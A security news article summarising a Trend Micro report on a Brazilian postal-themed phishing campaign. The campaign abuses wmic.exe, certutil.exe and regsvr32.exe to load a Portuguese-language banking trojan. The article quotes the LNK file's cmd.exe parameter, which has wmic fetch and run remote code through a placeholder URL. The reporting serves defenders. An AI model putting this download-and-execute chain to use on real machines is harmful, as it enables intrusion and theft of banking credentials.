Wednesday, May 7, 2025
HomeComputer SecurityNew Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

New Malware Abusing Two Legitimate Windows Files to Steal Victims Personal Data

Published on

SIEM as a Service

Follow Us on Google News

Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.

One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.

These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.

- Advertisement - Google News

Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.

Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.

How Does this Malware Abusing Legitimate Windows files

The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.

Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.

Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.

According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}

After the execution of cmd.exe attempt to download and execute the command from its command & control server.

It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.

Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.

Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.

Also Read:

New Adwind RAT Attack Linux, Windows and Mac via DDE Code Injection Technique by Evading Antivirus Software

Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

SpyCloud Analysis Reveals 94% of Fortune 50 Companies Have Employee Data Exposed in Phishing Attacks

SpyCloud, the leading identity threat protection company, today released an analysis of nearly 6...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector...

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its...

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect...